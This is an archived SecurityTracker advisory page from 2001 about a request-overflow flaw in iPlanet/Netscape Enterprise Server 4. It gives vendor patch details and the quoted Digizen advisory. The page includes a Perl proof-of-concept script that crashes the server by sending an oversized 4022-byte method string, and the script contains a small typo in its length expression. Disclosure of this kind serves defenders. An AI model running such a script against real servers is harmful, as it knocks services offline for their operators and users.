SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Web Server/CGI)  >   Sun ONE/iPlanet Web Server Vendors:   Netscape, Sun
(Exploit Code for Denial of Service) Re: iPlanet Web Server Allows Remote Users to Execute Arbitrary Code on the Server and to Crash the Server
SecurityTracker Alert ID:  1001584
SecurityTracker URL:  http://securitytracker.com/id/1001584
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  May 20 2001
Impact:   Denial of service via network, Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): v4.1 SP 3-7
Description:   iPlanet announced that there is a vulnerability in the iPlanet Web Server that allows a remote user to crash the web services. The vulnerability also allows a remote user to gain shell access on the server (note that iPlanet did not mention this latter impact in their advisory).

The Source Message contains a demonstration exploit script provided by Digizen Security Group.

Impact:   A remote user can cause the web server application to crash. In the Web Publisher vulnerability, a remote user can obtain shell access on the server.
Solution:   The vendor has released a fix. See the Vendor URL.

The vendor recommends deployment of the following NSAPI:

aix_flexlog2.tgz
dec-osf1_flexlog2.tgz
hpux_flexlog2.tgz
linux_flexlog2.tgz
solaris_flexlog2.tgz
winnt_flexlog2.zip

Vendor URL:  www.iplanet.com/products/iplanet_web_enterprise/iwsalert5.11.html (Links to External Site)
Cause:   Boundary error, Input validation error
Underlying OS:  Linux (Any), UNIX (AIX), UNIX (HP/UX), UNIX (Solaris - SunOS), Windows (NT), Windows (2000)

Message History:   This archive entry is a follow-up to the message listed below.
May 15 2001 iPlanet Web Server Allows Remote Users to Execute Arbitrary Code on the Server and to Crash the Server



 Source Message Contents

Subject:  Netscape Enterprise Server 4 Method and URI overflow


Digizen Security Group advisory, 2001
Netscape Enterprise Server 4 Method and URI overflow

Systems affected:
Netscape Enterprise Server 4/SP7 (possibly 4/SP3-SP7) running on
Windows NT and Win2k

Risk: Denial of Service
Date: 18 May 2001
Vendor Notified: 25 April 2001

Legal Notice:
This Advisory is Copyright (c) 2001 Digizen Security Group and Roberto
Cardona. You
may distribute it unmodified.  You may not modify it and distribute it or
distribute
parts of it without the author's  written permission.

Disclaimer:
In no event shall the author be liable for any damages whatsoever
arising out of or in connection with the use of this information.
Any use of this information is at the user's own risk.

Description:

By sending an invalid method or URI request of 4022 bytes Netscape
Enterprise Server will
stop responding to requests.

Vendor Status:
Netscape was informed and responded on the same business day.

Vendor's Response:

The security & stability of iPlanet's customer's environments is one of
our paramount concerns. To ensure the stability of our customer's
environments iPlanet has made available an NSAPI patch that can be
applied to iPlanet Web Server, Enterprise Edition version 4.1 Service
Packs 3 through 7. The NSAPI patch is available at
http://www.iplanet.com/products/iplanet_web_enterprise/iwsalert5.11.html.
This issue will also be addressed by the release of iPlanet Web Server,
Enterprise Edition version 4.1 Service Pack 8.

----------------------------------------------------------------------------
----------
#!/usr/bin/perl
use IO::Socket;
  if (@ARGV < 2)  {
     print "Usage: host port\n";
     exit;
   }
$overflow = "A" x $4022;
&connect;
sleep(15);
&connect;
exit;
################################################
sub connect() {
  $sock= IO::Socket::INET->new(Proto=>"TCP",
			     PeerAddr=>$ARGV[0],
			     PeerPort=>"$ARGV[1]",)
			     or die "Cant connect to $ARGV[0]: $!\n";
  $sock->autoflush(1);
  print $sock "$overflow /index.html HTTP/1.0\n\n";
  $response=<$sock>;
  print "$response";
  while(<$sock>){
     print "$_\n";
  }
  close $sock;
}



 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC